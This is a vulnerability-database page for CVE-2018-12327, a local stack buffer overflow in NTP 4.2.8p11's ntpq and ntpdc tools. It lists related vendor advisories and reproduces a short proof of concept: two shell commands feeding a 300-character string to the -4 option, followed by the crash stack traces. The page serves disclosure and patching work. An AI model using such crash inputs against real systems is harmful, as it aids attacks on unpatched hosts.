Vulners
Lucene search
ntp 4.2.8p11 Local Buffer Overflow
🗓️ 21 Jun 2018 00:00:00Reported by Fakhri ZulkifliType 
packetstorm🔗 packetstormsecurity.com👁 66 Views
| Reporter | Title | Published | Views | Family All 145 |
|---|---|---|---|---|
 | Security Bulletin: IBM Flex System Chassis Management Module (CMM) is affected by vulnerability in NTP (CVE-2018-12327) | 7 Dec 202322:45 | – | ibm |
| Security Bulletin: Vulnerabilities in NTPv4 affect AIX (CVE-2018-12327, CVE-2018-7170) | 14 Dec 201818:25 | – | ibm |
 | ntp 4.2.8p11 - Local Buffer Overflow (PoC) Vulnerability | 20 Jun 201800:00 | – | zdt |
 | Amazon Linux 2 : ntp (ALAS-2019-1367) | 25 Nov 201900:00 | – | nessus |
| Amazon Linux AMI : ntp (ALAS-2018-1083) | 20 Sep 201800:00 | – | nessus |
| CentOS 6 : ntp (CESA-2018:3854) | 20 Dec 201800:00 | – | nessus |
| CentOS 7 : ntp (CESA-2019:2077) | 30 Aug 201900:00 | – | nessus |
| EulerOS 2.0 SP5 : ntp (EulerOS-SA-2019-1014) | 8 Jan 201900:00 | – | nessus |
| EulerOS 2.0 SP3 : ntp (EulerOS-SA-2019-1037) | 15 Feb 201900:00 | – | nessus |
| EulerOS 2.0 SP2 : ntp (EulerOS-SA-2019-1053) | 22 Feb 201900:00 | – | nessus |
10
`# Exploit Title: ntpq and ntpdc 4.2.8p11 Local Buffer Overflow
# Date: 2018-06-06
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: http://www.ntp.org/
# Software Link: http://www.ntp.org/downloads.html
# Version: 4.2.8p11 and earlier
# Tested on: 4.2.8p11
# CVE : CVE-2018-12327
Stack-based buffer overflow in ntpq and ntpdc of NTP version 4.2.8p11 allows a local attacker to achieve code execution or escalate to higher privileges via a long string as the argument for an IPv4 or IPv6 command-line parameter.
$ ./ntpq -4 [`python -c 'print "A" * 300a`]
#0 0x562fcada86ce in openhost /home/user/ntp-4.2.8p11/ntpq/ntpq.c:655:12
#1 0x562fcada5f2a in ntpqmain /home/user/ntp-4.2.8p11/ntpq/ntpq.c:606:10
#2 0x562fcada4729 in main /home/user/ntp-4.2.8p11/ntpq/ntpq.c:469:9
#3 0x7f79b684982f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x562fcac96d88 in _start (/home/user/ntp-4.2.8p11/ntpq/ntpq+0xacd88)
$ ./ntpdc -4 [`python -c 'print "A" * 300'`]
#0 0x55f726641efe in openhost /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:413:12
#1 0x55f7266400d4 in ntpdcmain /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:365:10
#2 0x55f72663f269 in main /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:255:9
#3 0x7f0fc632382f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x55f7265362d8 in _start (/home/user/ntp-4.2.8p11/ntpdc/ntpdc+0x9d2d8)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jun 2018 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.15968